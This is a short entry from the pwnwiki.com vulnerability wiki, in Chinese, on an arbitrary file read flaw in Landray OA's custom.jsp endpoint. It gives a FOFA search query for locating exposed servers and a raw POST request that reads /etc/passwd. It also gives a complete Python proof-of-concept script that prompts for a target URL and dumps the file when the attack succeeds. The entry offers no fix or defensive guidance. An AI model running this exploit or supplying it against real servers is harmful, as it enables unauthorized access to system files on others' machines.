免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
FOFA
app="Landray-OA系统"
漏洞利用
出现漏洞的文件为 custom.jsp, 请求包如下:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"file:///etc/passwd"}}
POC
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m')
print('+ \03334mGithub : https://github.com/PeiQi0 \0330m')
print('+ \03334m公众号 : PeiQi文库 \0330m')
print('+ \03334mVersion: 蓝凌OA 任意文件读取 \0330m')
print('+ \03336m使用格式: python3 poc.py \0330m')
print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'var={"body":{"file":"file:///etc/passwd"}}'
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print("\03336mo 正在请求 {}/sys/ui/extend/varkind/custom.jsp \0330m".format(target_url))
if "root:" in response.text and response.status_code == 200:
print("\03336mo 成功读取 /etc/passwd \no 响应为:{} \0330m".format(response.text))
except Exception as e:
print("\03331mx 请求失败:{} \0330m".format(e))
sys.exit(0)
#
if __name__ == '__main__':
title()
target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m"))
POC_1(target_url)
PWNWIK.COM
